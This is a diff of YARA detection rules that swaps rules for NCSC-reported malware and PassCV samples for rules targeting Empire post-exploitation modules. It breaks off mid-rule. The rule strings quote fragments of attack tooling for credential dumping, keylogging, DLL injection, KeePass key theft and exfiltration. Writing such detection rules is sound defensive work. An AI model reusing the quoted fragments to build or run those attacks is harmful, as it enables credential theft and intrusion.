-rule SIGNATURE_BASE_Bytes_Used_In_AES_Key_Generation : FILE
+rule SIGNATURE_BASE_Empire_Reflectivepick_X64_Orig : FILE
 {
 	meta:
-		description = "Detects Backdoor.goodor"
-		author = "NCSC"
-		id = "26a549dd-cbd2-5abc-8d9d-5ea354d0ece8"
-		date = "2018-04-06"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L9-L22"
+		description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd69a149-d881-5f93-9647-84241bd96ba5"
+		date = "2016-11-05"
+		modified = "2022-12-21"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L224-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "221f5ea0a0224a96588912e7ddfbafd20b0b10c119395ca14d1138c284d7b79e"
+		logic_hash = "a87c5f1da9c490887cba5e9837ca40ac92b63d8c36b682f4be770ac061b5acdf"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
 
 	strings:
-		$a1 = {35 34 36 35 4B 4A 55 54 5E 49 55 5F 29 7B 68 36 35 67 34 36 64 66 35 68}
+		$a1 = "\\PowerShellRunner.pdb" ascii
+		$a2 = "PowerShellRunner.dll" fullword wide
+		$s1 = "ReflectivePick" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $a* ) and $s1
 }
-rule SIGNATURE_BASE_Partial_Implant_ID : FILE
+rule SIGNATURE_BASE_Empire_Out_Minidump : FILE
 {
 	meta:
-		description = "Detects implant from NCSC report"
-		author = "NCSC"
-		id = "15144f4a-2c96-57f0-b7e9-adbac477c38a"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Out-Minidump.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8c53d2ab-afc5-5d7b-97e1-496425b9664f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L24-L37"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L242-L256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "d0a29bed3c19007cb08427769918b0a02d5d247211a1ceaff31aed5839c78966"
+		logic_hash = "7ce4ac95ac942a2ad758b1d9034e6ec50d25d195ba1c2ae95a90a7490708e485"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
 
 	strings:
-		$a1 = {38 38 31 34 35 36 46 43}
+		$s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
+		$s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
+		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Sleep_Timer_Choice : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Psexec : FILE
 {
 	meta:
-		description = "Detects malware from NCSC report"
-		author = "NCSC"
-		id = "c64db0dd-2858-5508-ac51-d3318113a060"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Invoke-PsExec.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19aaec3e-3e8f-5d7d-9c70-a212756c0300"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L39-L52"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L258-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "5d2b656aabb113c50805d4af0faa62f579547dd4ec328ff2778fab64d778b8b9"
+		logic_hash = "86af63a3be5b4940966932b129edbe4cca5ac1a31d120ba44fdca739e9c97ad4"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
 
 	strings:
-		$a1 = {8b0424b90f00000083f9ff743499f7f98d420f}
+		$s1 = "Invoke-PsExecCmd" fullword ascii
+		$s2 = "\"[*] Executing service .EXE" fullword ascii
+		$s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
+		( uint16( 0 ) == 0x7566 and filesize < 50KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_User_Function_String
+rule SIGNATURE_BASE_Empire_Invoke_Postexfil : FILE
 {
 	meta:
-		description = "Detects user function string from NCSC report"
-		author = "NCSC"
-		id = "563ac6af-6b37-53c6-ae13-d97e31edb088"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Invoke-PostExfil.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "58d9e057-efde-56ab-9b7e-982342a910e2"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L54-L71"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L275-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
-		logic_hash = "04821d1d5c12b5a9aca3c5b4be9f7a7d35320ad1503ccbdadebc7710c613a976"
+		logic_hash = "74602d1c4986e6392df8845e0ed713499aa3b93c64e9d68e95f9dbaf60fe4299"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
 
 	strings:
-		$a2 = "e.RandomHashString"
-		$a3 = "e.Decode"
-		$a4 = "e.Decrypt"
-		$a5 = "e.HashStr"
-		$a6 = "e.FromB64"
+		$s1 = "# upload to a specified exfil URI" fullword ascii
+		$s2 = "Server path to exfil to." fullword ascii
 
 	condition:
-		4 of ( $a* )
+		( uint16( 0 ) == 0x490a and filesize < 2KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Generic_Shellcode_Downloader_Specific : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Smbautobrute : FILE
 {
 	meta:
-		description = "Detects Doorshell from NCSC report"
-		author = "NCSC"
-		id = "ddd25add-ff84-5106-ac3c-5d5b4c1ef2a9"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a6b402ac-0925-5bc6-9d6a-b2b811496f9e"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L73-L89"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L291-L305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b8bc0611a7fd321d2483a0a9a505251e15c22402e0cfdc62c0258af53ed3658a"
-		logic_hash = "9315ad03b5a28030c32fea5547db3ae421a1ebdae0b96a8a4c2f92660c41bc40"
+		logic_hash = "dd87a5d3a710017953c8c19862e4daee25de0e57175cab8246eea6d067fcb4d1"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
 
 	strings:
-		$push1 = {68 6C 6C 6F 63}
-		$push2 = {68 75 61 6C 41}
-		$push3 = {68 56 69 72 74}
-		$a = {BA 90 02 00 00 46 C1 C6 19 03 DD 2B F4 33 DE}
-		$b = {87 C0 81 F2 D1 19 89 14 C1 C8 1F FF E0}
+		$s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
+		$s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3C ) ) == 0x4550 ) and ( $a or $b ) and @push1 < @push2 and @push2 < @push3
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Batch_Script_To_Run_Psexec
+rule SIGNATURE_BASE_Empire_Get_Keystrokes : FILE
 {
 	meta:
-		description = "Detects malicious batch file from NCSC report"
-		author = "NCSC"
-		id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Get-Keystrokes.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fb57a0d-6b65-5ee8-96ef-9af303f15007"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L91-L107"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L307-L320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
-		logic_hash = "9bdaa14aa535c178914f83c12b23484162f085c6fc6041d379268546ee99f462"
+		logic_hash = "710e1bbf517c6683bd3082786e605cb8e6a52460f9c96609610e5ab38800dc79"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
 
 	strings:
-		$ = "Tokens=1 delims=" ascii
-		$ = "SET ws=%1" ascii
-		$ = "Checking %ws%" ascii
-		$ = "%TEMP%\\%ws%ns.txt" ascii
-		$ = "ps.exe -accepteula" ascii
+		$s1 = "$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Batch_Powershell_Invoke_Inveigh
+rule SIGNATURE_BASE_Empire_Invoke_Dllinjection : FILE
 {
 	meta:
-		description = "Detects malicious batch file from NCSC report"
-		author = "NCSC"
-		id = "c5dab029-6515-5d58-9ccd-bf438ba692d5"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Invoke-DllInjection.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6aa14e8f-9801-5cd3-beb0-955e19d25503"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L109-L124"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L322-L335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0a6b1b29496d4514f6485e78680ec4cd0296ef4d21862d8bf363900a4f8e3fd2"
-		logic_hash = "5048a180df301707622e9ad0b949da9e39d2f55f16fc43e7344a8181596a836c"
+		logic_hash = "450ca96dd7c80275d7e4eaf07a7229e27530c373b8d79af5be8f4a741daef448"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
 
 	strings:
-		$ = "Inveigh.ps1" ascii
-		$ = "Invoke-Inveigh" ascii
-		$ = "-LLMNR N -HTTP N -FileOutput Y" ascii
-		$ = "powershell.exe" ascii
+		$s1 = "-Dll evil.dll" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Lnk_Detect : FILE
+rule SIGNATURE_BASE_Empire_Keepassconfig : FILE
 {
 	meta:
-		description = "Detects malicious LNK file from NCSC report"
-		author = "NCSC"
-		id = "76d382f3-b2f2-5ede-94b2-5ae8b766c194"
-		date = "2018-04-06"
+		description = "Detects Empire component - file KeePassConfig.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "814a6ff9-a6ac-55e7-bb3f-597351ce421d"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L126-L149"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L337-L350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae8796877d70f8ddd56bac8ed474231f26d9bc8e73625e65d5d927ab804996b3"
+		logic_hash = "044c8a326ee6cc74a918e6c28100032bfd2fb396ddab8683ab11e00f9370ab2a"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
 
 	strings:
-		$lnk_magic = {4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46}
-		$lnk_target = {41 00 55 00 54 00 4F 00 45 00 58 00 45 00 43 00 2E 00 42 00 41 00 54}
-		$s1 = {5C 00 5C 00 31 00}
-		$s2 = {5C 00 5C 00 32 00}
-		$s3 = {5C 00 5C 00 33 00}
-		$s4 = {5C 00 5C 00 34 00}
-		$s5 = {5C 00 5C 00 35 00}
-		$s6 = {5C 00 5C 00 36 00}
-		$s7 = {5C 00 5C 00 37 00}
-		$s8 = {5C 00 5C 00 38 00}
-		$s9 = {5C 00 5C 00 39 00}
+		$s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and uint32be( 4 ) == 0x01140200 and ( ( $lnk_magic at 0 ) and $lnk_target ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_RDP_Brute_Strings
+rule SIGNATURE_BASE_Empire_Invoke_Sshcommand : FILE
 {
 	meta:
-		description = "Detects RDP brute forcer from NCSC report"
-		author = "NCSC"
-		id = "d6f0cdbc-a910-5826-b25a-61c2924f8e2a"
-		date = "2018-04-06"
+		description = "Detects Empire component - file Invoke-SSHCommand.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b06b507f-b6b8-5f4b-8d6d-920f141e9ac1"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L151-L174"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L352-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8234bf8a1b53efd2a452780a69666d1aedcec9eb1bb714769283ccc2c2bdcc65"
-		logic_hash = "80c51d82a57271409d298b5175505c4234a6c3ec8a8763c93b669d1f0a8d59ba"
+		logic_hash = "3749c3d58335cb08bff66fe3126fc4977261576a9fbedbd7da673e3921364850"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
 
 	strings:
-		$ = "RDP Brute" ascii wide
-		$ = "RdpChecker" ascii
-		$ = "RdpBrute" ascii
-		$ = "Brute_Count_Password" ascii
-		$ = "BruteIPList" ascii
-		$ = "Chilkat_Socket_Key" ascii
-		$ = "Brute_Sync_Stat" ascii
-		$ = "(Error! Hyperlink reference not valid.)" wide
-		$ = "BadRDP" wide
-		$ = "GoodRDP" wide
-		$ = "@echo off{0}:loop{0}del {1}{0}if exist {1} goto loop{0}del {2}{0}del \"{2}\"" wide
-		$ = "Coded by z668" wide
+		$s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
+		$s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
+		$s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
 
 	condition:
-		4 of them
+		( uint16( 0 ) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_1
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen1 : FILE
 {
 	meta:
-		description = "Detects Z Webshell from NCSC report"
-		author = "NCSC"
-		id = "f4b50760-bd3a-5e1f-bf32-50f16a42c381"
-		date = "2018-04-06"
+		description = "Detects Empire component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8fdb48a0-5d40-55be-ae23-e9c8c4c2ecea"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		old_rule_name = "Z_WebShell"
-		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L176-L192"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L371-L390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ace12552f3a980f1eed4cadb02afe1bfb851cafc8e58fb130e1329719a07dbf0"
-		logic_hash = "1dfc546a7493c1443527ebe74ed8cd2b06ee032b9a3f736b830e16288e616d43"
+		logic_hash = "074423d30c5ef419d1ca9433477d8a896086cec84eb939270ce51d3965b6b1a2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$ = "Z_PostBackJS" ascii wide
-		$ = "z_file_download" ascii wide
-		$ = "z_WebShell" ascii wide
-		$ = "1367948c7859d6533226042549228228" ascii wide
+		$s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
+		$s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_1 : FILE
+rule SIGNATURE_BASE_Empire_Powerup_Gen : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99a26daa-c563-5b23-89b9-965d8ce7229d"
-		date = "2016-10-20"
+		id = "ae6b0462-7193-54a4-8fb9-befc1b461b15"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L10-L34"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L392-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dfa356b4dff12c3de467c74763fc4d233db9ff5bc3e9ac9f052d331fa47a4ded"
+		logic_hash = "4086b057b46cac85bb871d2d4363d4ae4c99a160e5c9625e4d41e3df55fece2d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a"
-		hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55"
+		super_rule = 1
+		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
 
 	strings:
-		$x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii
-		$x2 = "bin\\oSaberSvc.pdb" ascii
-		$s1 = "cmd.exe /c MD " fullword ascii
-		$s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide
-		$s3 = "CloudRun.exe" fullword wide
-		$s4 = "SaberSvcB.exe" fullword wide
-		$s5 = "SaberSvc.exe" fullword wide
-		$s6 = "SaberSvcW.exe" fullword wide
-		$s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide
-		$s8 = "Internet Connect Failed!" fullword ascii
+		$s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
+		$s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) and 5 of ( $s* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_Signing_Cert : FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen2 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b2d1313-6454-5e3f-9b58-5b1a26739ba8"
-		date = "2016-10-20"
+		id = "eab277ca-0dd4-5035-82aa-1ac2120bac94"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L36-L57"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L409-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ead1de262858960a13b375713183f775bc275fbf4beba4c0839cef2baa5e9f00"
-		score = 50
+		logic_hash = "e3cb63d0c3278ee4d04cb4b1d6ebe817fb3da97d25e2581f95bd43ecd5142b30"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$s1 = "WOODTALE TECHNOLOGY INC" ascii
-		$s2 = "Flyingbird Technology Limited" ascii
-		$s3 = "Neoact Co., Ltd." ascii
-		$s4 = "AmazGame Age Internet Technology Co., Ltd" ascii
-		$s5 = "EMG Technology Limited" ascii
-		$s6 = "Zemi Interactive Co., Ltd" ascii
-		$s7 = "337 Technology Limited" ascii
-		$s8 = "Runewaker Entertainment0" fullword ascii
+		$x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
+		$s20 = "#Shellcode: CallDllMain.asm" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_2 : FILE
+rule SIGNATURE_BASE_Empire_Agent_Gen : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Detects Empire component - from files agent.ps1, agent.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd9eb5f6-9faa-584d-b3b5-6dcfdc3f359c"
-		date = "2016-10-20"
+		id = "0fac915c-2502-50da-93d1-f81e9282aa9a"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L59-L82"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L430-L447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f640f1dc60c6714195dcdb9a0bb4fb0c34e0a62673bca00c7f49f7b73c3f9b0a"
